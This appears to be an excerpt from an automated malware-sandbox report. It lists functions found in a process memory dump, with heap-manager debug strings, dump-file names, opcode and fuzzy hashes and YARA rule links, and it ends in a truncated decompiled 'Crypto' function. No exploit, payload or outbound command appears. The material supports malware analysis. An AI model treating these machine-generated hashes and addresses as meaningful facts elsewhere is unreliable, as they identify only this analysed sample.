                                                                                                                                                              0x0099db53
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0095766e

                                                                                                                                                              Strings
                                                                                                                                                              • HEAP[%wZ]: , xrefs: 0099DAA6, 0099DB8E
                                                                                                                                                              • HEAP: , xrefs: 0099DAB3, 0099DB9B
                                                                                                                                                              • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 0099DBA6
                                                                                                                                                              • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 0099DABE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                                                              • API String ID: 0-1657114761
                                                                                                                                                              • Opcode ID: 43f89f4d82f6d9afd74a7a6e2a012df44d14728dede6801596296c1eca9e1dc8
                                                                                                                                                              • Instruction ID: 7eaa5729fda1e1091d375b3f682c778c975ef98fbb9f123d0f51234826b92a7b
                                                                                                                                                              • Opcode Fuzzy Hash: 43f89f4d82f6d9afd74a7a6e2a012df44d14728dede6801596296c1eca9e1dc8
                                                                                                                                                              • Instruction Fuzzy Hash: CD02CC71608606CFCB14CF9AD484A7AB7F5FF44311F198599E8458B291E338EE89DB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0095351F, Relevance: 5.1, Strings: 3, Instructions: 1392COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 009AA4AC
                                                                                                                                                              • HEAP[%wZ]: , xrefs: 009AA48B
                                                                                                                                                              • HEAP: , xrefs: 009AA498
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-2419525547
                                                                                                                                                              • Opcode ID: be15044b2a937c26459317eb7818e2f0a0ea92cf0a9f7f7ba18c07b4d0e1ea7d
                                                                                                                                                              • Instruction ID: 3194da04d1b45af4b498800ebf3683ddb6075b2cf2ebd0e809a9ea40a0ddee69
                                                                                                                                                              • Opcode Fuzzy Hash: be15044b2a937c26459317eb7818e2f0a0ea92cf0a9f7f7ba18c07b4d0e1ea7d
                                                                                                                                                              • Instruction Fuzzy Hash: 57C2AA72A00212CFCB18CF19C494A7A77B6FF95301B29C5A9EC9A8B355E734ED41DB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00953040, Relevance: 4.8, Strings: 3, Instructions: 1098COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 009AACD9
                                                                                                                                                              • HEAP[%wZ]: , xrefs: 009AACB5
                                                                                                                                                              • HEAP: , xrefs: 009AACC2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-2419525547
                                                                                                                                                              • Opcode ID: 1e5c6b57239594134a10eac5d462f877262394d5f5f82588f7983a4650062ead
                                                                                                                                                              • Instruction ID: 6921ad42b2102ddcd0ef2ce91e51bed282c2d05f24609ef8e09517764c248bf6
                                                                                                                                                              • Opcode Fuzzy Hash: 1e5c6b57239594134a10eac5d462f877262394d5f5f82588f7983a4650062ead
                                                                                                                                                              • Instruction Fuzzy Hash: 07A2EF70904215CFDB28CF6AC480BA9BBB5FF49302F14859EEC969B291D734AD85CF61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0095C85C, Relevance: 4.6, Strings: 3, Instructions: 858COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • HEAP[%wZ]: , xrefs: 009ADC0F
                                                                                                                                                              • HEAP: , xrefs: 009ADC1C
                                                                                                                                                              • Unable to release memory at %p for %p bytes - Status == %x, xrefs: 009ADC30
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %p bytes - Status == %x
                                                                                                                                                              • API String ID: 0-212623055
                                                                                                                                                              • Opcode ID: 2fed3746d725e2278831b5e9e69795c62b6be124649651c5a6a924a359d9df65
                                                                                                                                                              • Instruction ID: 8525277d31cf8d000d4b2605a397e1bad8baf99d2637fdd8afc9adc71e788699
                                                                                                                                                              • Opcode Fuzzy Hash: 2fed3746d725e2278831b5e9e69795c62b6be124649651c5a6a924a359d9df65
                                                                                                                                                              • Instruction Fuzzy Hash: 0F721FB1904359DFDB24CFA9C840BBDBBF4BF09301F148459E896AB691D338A949DF60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009529B2, Relevance: 4.6, Strings: 3, Instructions: 851COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-2419525547
                                                                                                                                                              • Opcode ID: d84906e778beff3d7a0887cdbb06832bbcfe1cf6521852fbcdb6d3b6df802207
                                                                                                                                                              • Instruction ID: 6c14ff7a64237489879d5aeaed7574cb75b3508772bd04fcbcfbe705a48084a4
                                                                                                                                                              • Opcode Fuzzy Hash: d84906e778beff3d7a0887cdbb06832bbcfe1cf6521852fbcdb6d3b6df802207
                                                                                                                                                              • Instruction Fuzzy Hash: 0572BC70600216DFDB28CF19C490A7AB7B5FF86315F25C49DE84A8B292D734ED85CBA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0095CD5B, Relevance: 4.2, Strings: 3, Instructions: 478COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 009AD65A
                                                                                                                                                              • HEAP[%wZ]: , xrefs: 009AD639
                                                                                                                                                              • HEAP: , xrefs: 009AD646
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-2419525547
                                                                                                                                                              • Opcode ID: 8ce05b62b8a4c6995016911a0380196a306383c92910bef1979f9b2049d6f7cd
                                                                                                                                                              • Instruction ID: 281a661b8374d2737ad84c02585cf6c132d5e59ea5416e733a69678f6aab7198
                                                                                                                                                              • Opcode Fuzzy Hash: 8ce05b62b8a4c6995016911a0380196a306383c92910bef1979f9b2049d6f7cd
                                                                                                                                                              • Instruction Fuzzy Hash: 0502E2B0500245DFCB28CF29C491ABABBF5FF55305F14885EEC868B686D734E949DB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009763DB, Relevance: 4.1, Strings: 3, Instructions: 340COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x), xrefs: 009A9636
                                                                                                                                                              • HEAP[%wZ]: , xrefs: 009A9616
                                                                                                                                                              • HEAP: , xrefs: 009A9623
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x)
                                                                                                                                                              • API String ID: 0-385592399
                                                                                                                                                              • Opcode ID: 6e011bd280f83f09f94f0863942c92ea859aaecdf8214415fbd83ced4eafd46a
                                                                                                                                                              • Instruction ID: 70d4f31a6ce6fe95f4090fdb1ecfaaa539bbb693ffdb84780172f16b1e1c0e35
                                                                                                                                                              • Opcode Fuzzy Hash: 6e011bd280f83f09f94f0863942c92ea859aaecdf8214415fbd83ced4eafd46a
                                                                                                                                                              • Instruction Fuzzy Hash: 1FD1FD72A00A56DFCB15CF69C480BBAB7F4BF49300F24C199E9599B295D734ED01EBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00961489, Relevance: 4.0, Strings: 3, Instructions: 271COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • HEAP[%wZ]: , xrefs: 009B2D07
                                                                                                                                                              • HEAP: , xrefs: 009B2D14
                                                                                                                                                              • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 009B2D1F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                                                                                                                              • API String ID: 0-1596344177
                                                                                                                                                              • Opcode ID: d0102014cd19d75bf2d95e1f1f17c9e5843e1201b414266c6c06a99224fb0a35
                                                                                                                                                              • Instruction ID: 7756627dfdf819d38d713db0fd13491321c0699fee717cb5bcfa377ea2998b41
                                                                                                                                                              • Opcode Fuzzy Hash: d0102014cd19d75bf2d95e1f1f17c9e5843e1201b414266c6c06a99224fb0a35
                                                                                                                                                              • Instruction Fuzzy Hash: 9AB19D71600606DFCB28CF28C494A79B7F1FF89311B5586A9E8A68B792D730E980DF50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009D579A, Relevance: 3.9, Strings: 3, Instructions: 142COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • HEAP[%wZ]: , xrefs: 009D58D7
                                                                                                                                                              • HEAP: , xrefs: 009D58E4
                                                                                                                                                              • Heap block at %p modified at %p past requested size of %lx, xrefs: 009D58F7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %lx
                                                                                                                                                              • API String ID: 0-3722492067
                                                                                                                                                              • Opcode ID: 3827bab6043e582fce24940156338eea5baec602d18d482464af0a2be217398e
                                                                                                                                                              • Instruction ID: 77f402bb08e587b7d10e5b184fd07a1e67ceb5cdfec9aac519621fc10c167c67
                                                                                                                                                              • Opcode Fuzzy Hash: 3827bab6043e582fce24940156338eea5baec602d18d482464af0a2be217398e
                                                                                                                                                              • Instruction Fuzzy Hash: 4F412135290A50DBD364CF19C840AB277E4EF40791B96C85AF8D6CB382D329E846FB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00A03A83, Relevance: 2.8, Strings: 2, Instructions: 307COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: *.*$MUI
                                                                                                                                                              • API String ID: 0-3752369296
                                                                                                                                                              • Opcode ID: 2732df63c48113a97d3f2675b22f56372d3f6b7acc70a99a2e84abc8075114c5
                                                                                                                                                              • Instruction ID: 7daeb583e7c2c4660625d5d8df13349ac7d7a276be658eaace53aca9eab64f48
                                                                                                                                                              • Opcode Fuzzy Hash: 2732df63c48113a97d3f2675b22f56372d3f6b7acc70a99a2e84abc8075114c5
                                                                                                                                                              • Instruction Fuzzy Hash: DAC150369056289ACF71DF28DC49B9AB3B8AF49300F0486DAE549E7290DB709FC4CF51
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009D6BCB, Relevance: 2.8, Strings: 2, Instructions: 281COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $
                                                                                                                                                              • API String ID: 0-227171996
                                                                                                                                                              • Opcode ID: eceeb7d5a1c837f975b608e4b23f623f79ffd4885533c1e23aee20dd00f88500
                                                                                                                                                              • Instruction ID: 3861fbcf3edf3a36a7aecf52673a92e1226b4534d11e6cc85040291ad80d5dbe
                                                                                                                                                              • Opcode Fuzzy Hash: eceeb7d5a1c837f975b608e4b23f623f79ffd4885533c1e23aee20dd00f88500
                                                                                                                                                              • Instruction Fuzzy Hash: B791E336F901159BDF28CE69C8801AD7766EB99315F24C22FD996EB3C4DA30AD41CB80
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0098D47D, Relevance: 2.4, Strings: 1, Instructions: 1138COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-3916222277
                                                                                                                                                              • Opcode ID: 5ef3d935e7cdd50eacf55d65a6de234dfdd6e997cec43f2115bca2afaff058cc
                                                                                                                                                              • Instruction ID: 7b93016740ce1aab06a5464c39dcc4ceee06e37bc39be3d4d17ca93e49e21fc4
                                                                                                                                                              • Opcode Fuzzy Hash: 5ef3d935e7cdd50eacf55d65a6de234dfdd6e997cec43f2115bca2afaff058cc
                                                                                                                                                              • Instruction Fuzzy Hash: 77A248729012699FEF359F14CC81BEABBB9BB05300F1484EAE54DA3281DB749E84DF51
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009DBF14, Relevance: 2.0, Strings: 1, Instructions: 737COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: #
                                                                                                                                                              • API String ID: 0-1885708031
                                                                                                                                                              • Opcode ID: 640167b91227f33b61ccad50f3b5fed623ea48f128542879816f780f48a6b547
                                                                                                                                                              • Instruction ID: 57cec94b706642055b4505564ce2f6a86d89851ff10fe69e0a57287315aa62ab
                                                                                                                                                              • Opcode Fuzzy Hash: 640167b91227f33b61ccad50f3b5fed623ea48f128542879816f780f48a6b547
                                                                                                                                                              • Instruction Fuzzy Hash: 91428AB2D8421A9BDF21DFE4C841BEEB7B9EF48740F14842AE911B7351DB749941CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009669FE, Relevance: 1.7, Strings: 1, Instructions: 437COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 8@8
                                                                                                                                                              • API String ID: 0-222468769
                                                                                                                                                              • Opcode ID: 52a7b4fd9904778a68f426b789c55f952f178534bf943c7b801e7968525b1fea
                                                                                                                                                              • Instruction ID: 61492f70f33a6ef58e6f938f794e652a8efb53e694bdb6f3907863c18e4fa343
                                                                                                                                                              • Opcode Fuzzy Hash: 52a7b4fd9904778a68f426b789c55f952f178534bf943c7b801e7968525b1fea
                                                                                                                                                              • Instruction Fuzzy Hash: 58F15C71A00249AFDF15DFA4C881BAEBBB8EF45704F10845AF981EB291D379DD81CB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00408C60, Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                              			E00408C60(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
